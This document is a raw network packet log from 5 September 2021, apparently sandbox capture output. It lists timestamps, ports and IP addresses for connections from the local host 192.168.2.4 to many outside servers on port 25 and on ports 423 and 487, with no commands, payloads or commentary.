Sep 5, 2021 15:50:48.723052979 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:48.737746000 CEST	423	50090	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.737842083 CEST	50090	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.737962961 CEST	423	50098	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.738050938 CEST	50098	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.758385897 CEST	423	50095	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:48.759149075 CEST	423	50096	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:48.763097048 CEST	423	50098	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.763370991 CEST	50098	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:48.788249969 CEST	423	50098	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:48.810453892 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.834696054 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.836853027 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:48.837173939 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:48.860645056 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.870810986 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:48.886125088 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:48.890947104 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.904427052 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:48.915677071 CEST	50092	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.915755987 CEST	50093	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.916263103 CEST	50099	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.916655064 CEST	50100	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.917144060 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.917258024 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.917299032 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.917335987 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.917418957 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.917541027 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.943470955 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.943521023 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.947194099 CEST	423	50093	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.947325945 CEST	50093	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.947510958 CEST	423	50100	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.947643995 CEST	50100	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.948304892 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:48.952088118 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:48.952146053 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:48.955001116 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.957503080 CEST	423	50099	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.957537889 CEST	423	50092	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:48.957613945 CEST	50099	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.957629919 CEST	50092	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:48.979326010 CEST	423	50100	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:48.979566097 CEST	50100	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:48.981028080 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.981071949 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:48.981218100 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.981479883 CEST	50089	25	192.168.2.4	87.98.164.155
Sep 5, 2021 15:50:48.999088049 CEST	423	50099	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:49.007951975 CEST	25	50089	87.98.164.155	192.168.2.4
Sep 5, 2021 15:50:49.011174917 CEST	423	50100	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:49.020070076 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.020230055 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.020391941 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.020960093 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.020987034 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.049072027 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.072865009 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.073095083 CEST	50099	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:49.076538086 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:49.085747004 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.085958958 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.086113930 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.086275101 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.086363077 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.086404085 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.086483002 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.114684105 CEST	423	50099	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:49.152990103 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.153100014 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.153606892 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.170263052 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:49.191482067 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.191504955 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.194789886 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.241277933 CEST	50097	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:49.243824959 CEST	50091	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:49.253863096 CEST	50101	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:49.308175087 CEST	487	50097	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:49.313644886 CEST	423	50091	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:49.313746929 CEST	50091	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:49.325876951 CEST	423	50101	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:49.326061010 CEST	50101	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:49.384479046 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:49.398534060 CEST	423	50101	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:49.402538061 CEST	50101	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:49.413259983 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:49.474170923 CEST	423	50101	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:49.556446075 CEST	50096	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:49.556463003 CEST	50095	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:49.556497097 CEST	50098	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.557123899 CEST	50102	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:49.557595015 CEST	50103	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:49.558125973 CEST	50104	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.561258078 CEST	25	50086	3.130.46.147	192.168.2.4
Sep 5, 2021 15:50:49.561374903 CEST	50086	25	192.168.2.4	3.130.46.147
Sep 5, 2021 15:50:49.583693981 CEST	423	50098	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:49.583904028 CEST	50098	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.585063934 CEST	50105	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:49.585828066 CEST	50106	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:49.586091995 CEST	423	50104	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:49.586179018 CEST	50104	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.587218046 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:49.612210989 CEST	423	50104	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:49.612560034 CEST	50104	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.628968000 CEST	423	50103	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:49.629064083 CEST	50103	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:49.630497932 CEST	423	50095	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:49.630599022 CEST	50095	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:49.630855083 CEST	423	50096	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:49.630872011 CEST	423	50102	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:49.630955935 CEST	50096	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:49.630985022 CEST	50102	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:49.637291908 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.639730930 CEST	423	50104	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:49.640328884 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:49.640461922 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:49.649818897 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:49.665832043 CEST	50100	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:49.666358948 CEST	50108	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:49.674211025 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.691451073 CEST	25	50106	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:49.691612959 CEST	50106	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:49.692148924 CEST	50106	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:49.695252895 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:49.697154045 CEST	423	50100	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:49.697271109 CEST	50100	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:49.700752974 CEST	423	50108	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:49.700896025 CEST	50108	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:49.702758074 CEST	423	50103	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:49.706269026 CEST	423	50102	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:49.712529898 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:49.713162899 CEST	50103	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:49.713401079 CEST	50102	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:49.736725092 CEST	423	50108	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:49.736964941 CEST	50108	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:49.740430117 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.747101068 CEST	25	50105	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:49.747248888 CEST	50105	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:49.765865088 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:49.765872002 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:49.768136978 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:49.768306971 CEST	423	50108	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:49.776653051 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:49.782591105 CEST	423	50103	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:49.785252094 CEST	423	50102	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:49.789050102 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.796960115 CEST	25	50106	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:49.798604012 CEST	25	50106	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:49.798686028 CEST	50106	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:49.799264908 CEST	25	50106	40.93.207.1	192.168.2.4
Sep 5, 2021 15:50:49.799340010 CEST	50106	25	192.168.2.4	40.93.207.1
Sep 5, 2021 15:50:49.806380033 CEST	50099	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:49.806927919 CEST	50109	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:49.830427885 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:49.842869997 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:49.847851038 CEST	423	50099	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:49.847974062 CEST	50099	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:49.848606110 CEST	423	50109	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:49.848692894 CEST	50109	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:49.888070107 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.891396046 CEST	423	50109	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:49.891618967 CEST	50109	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:49.901309967 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:49.916654110 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:49.931452990 CEST	50101	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:49.931494951 CEST	50104	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.932039022 CEST	50110	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:49.932460070 CEST	50111	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.933413982 CEST	423	50109	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:49.939883947 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.939917088 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.940051079 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:49.940058947 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.940085888 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.940109015 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.957043886 CEST	423	50104	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:49.957246065 CEST	423	50111	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:49.957281113 CEST	50104	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.957356930 CEST	50111	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:49.963207006 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.963252068 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:49.982609034 CEST	423	50111	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:49.982955933 CEST	50111	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:50.003076077 CEST	423	50101	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.003170013 CEST	50101	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.005357027 CEST	423	50110	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.005527973 CEST	50110	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.007850885 CEST	423	50111	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:50.053509951 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.076385975 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:50.079449892 CEST	423	50110	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.079761028 CEST	50110	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.099994898 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:50.110224009 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:50.118871927 CEST	50102	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:50.118901014 CEST	50103	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:50.118959904 CEST	50108	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.119448900 CEST	50112	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:50.119824886 CEST	50113	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:50.120206118 CEST	50114	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.127676964 CEST	25	50105	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:50.127702951 CEST	25	50105	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:50.127777100 CEST	50105	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:50.132199049 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.132656097 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.135679007 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:50.146733999 CEST	50105	25	192.168.2.4	52.73.137.222
Sep 5, 2021 15:50:50.152757883 CEST	423	50114	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.152868986 CEST	50114	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.153083086 CEST	423	50108	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.153161049 CEST	50108	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.156006098 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:50.156034946 CEST	423	50110	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.156352043 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:50.156883001 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:50.156956911 CEST	50094	25	192.168.2.4	176.9.75.42
Sep 5, 2021 15:50:50.157927990 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:50.181780100 CEST	25	50094	176.9.75.42	192.168.2.4
Sep 5, 2021 15:50:50.186435938 CEST	423	50114	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.186640978 CEST	50114	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.190773964 CEST	423	50103	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:50.190922022 CEST	50103	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:50.191359043 CEST	423	50112	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:50.191513062 CEST	50112	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:50.193176031 CEST	423	50113	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:50.193309069 CEST	50113	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:50.193459034 CEST	423	50102	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:50.193521976 CEST	50102	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:50.198194981 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.213594913 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.213632107 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.213659048 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.213748932 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:50.214116096 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.214143038 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.217259884 CEST	423	50114	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.239721060 CEST	50116	25	192.168.2.4	35.162.106.154
Sep 5, 2021 15:50:50.264276028 CEST	423	50112	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:50.264674902 CEST	50112	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:50.267904043 CEST	423	50113	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:50.268171072 CEST	50113	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:50.268403053 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.272506952 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.272649050 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.288163900 CEST	25	50105	52.73.137.222	192.168.2.4
Sep 5, 2021 15:50:50.322025061 CEST	50109	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:50.333663940 CEST	50117	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:50.335794926 CEST	423	50112	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:50.341770887 CEST	423	50113	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:50.347451925 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.347484112 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.347604990 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:50.364342928 CEST	423	50109	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:50.364445925 CEST	50109	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:50.366298914 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.374742031 CEST	423	50117	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:50.374912024 CEST	50117	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:50.416676044 CEST	423	50117	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:50.418911934 CEST	25	50116	35.162.106.154	192.168.2.4
Sep 5, 2021 15:50:50.419044018 CEST	50116	25	192.168.2.4	35.162.106.154
Sep 5, 2021 15:50:50.423314095 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.435945034 CEST	50117	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:50.444001913 CEST	50107	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:50.477058887 CEST	423	50117	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:50.494816065 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.497144938 CEST	25	50107	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:50.506927967 CEST	50118	25	192.168.2.4	67.219.246.204
Sep 5, 2021 15:50:50.512340069 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.516168118 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.516269922 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.572118044 CEST	50111	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:50.572711945 CEST	50119	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:50.587937117 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.587961912 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.597407103 CEST	423	50111	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:50.597528934 CEST	50111	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:50.597918987 CEST	423	50119	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:50.598033905 CEST	50119	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:50.605179071 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.605396986 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605484009 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605546951 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605607986 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605684042 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605786085 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605833054 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605844975 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.605869055 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.624780893 CEST	423	50119	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:50.625056028 CEST	50119	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:50.646931887 CEST	25	50118	67.219.246.204	192.168.2.4
Sep 5, 2021 15:50:50.647083998 CEST	50118	25	192.168.2.4	67.219.246.204
Sep 5, 2021 15:50:50.650352955 CEST	423	50119	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:50.677035093 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.677058935 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.677169085 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.677325010 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.712121010 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:50.712726116 CEST	50110	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.712753057 CEST	50114	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.713170052 CEST	50121	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.713588953 CEST	50122	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.717185020 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.717616081 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.717701912 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.717924118 CEST	50115	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:50.743511915 CEST	423	50114	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.743616104 CEST	50114	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.744286060 CEST	423	50122	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.744396925 CEST	50122	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.776113033 CEST	423	50122	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.780004025 CEST	423	50121	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.780095100 CEST	50121	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.786624908 CEST	423	50110	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.786778927 CEST	50110	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.789382935 CEST	487	50115	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:50.833019018 CEST	25	50120	148.163.152.155	192.168.2.4
Sep 5, 2021 15:50:50.833189964 CEST	50120	25	192.168.2.4	148.163.152.155
Sep 5, 2021 15:50:50.847529888 CEST	423	50121	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.881508112 CEST	50121	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:50.884533882 CEST	50122	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.921283960 CEST	50122	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:50.935036898 CEST	25	50116	35.162.106.154	192.168.2.4
Sep 5, 2021 15:50:50.937082052 CEST	25	50116	35.162.106.154	192.168.2.4
Sep 5, 2021 15:50:50.939812899 CEST	50116	25	192.168.2.4	35.162.106.154
Sep 5, 2021 15:50:50.953453064 CEST	423	50121	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:50.953630924 CEST	423	50122	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:50.961324930 CEST	25	50118	67.219.246.204	192.168.2.4
Sep 5, 2021 15:50:50.962142944 CEST	25	50118	67.219.246.204	192.168.2.4
Sep 5, 2021 15:50:50.962234020 CEST	50118	25	192.168.2.4	67.219.246.204
Sep 5, 2021 15:50:50.965430975 CEST	50116	25	192.168.2.4	35.162.106.154
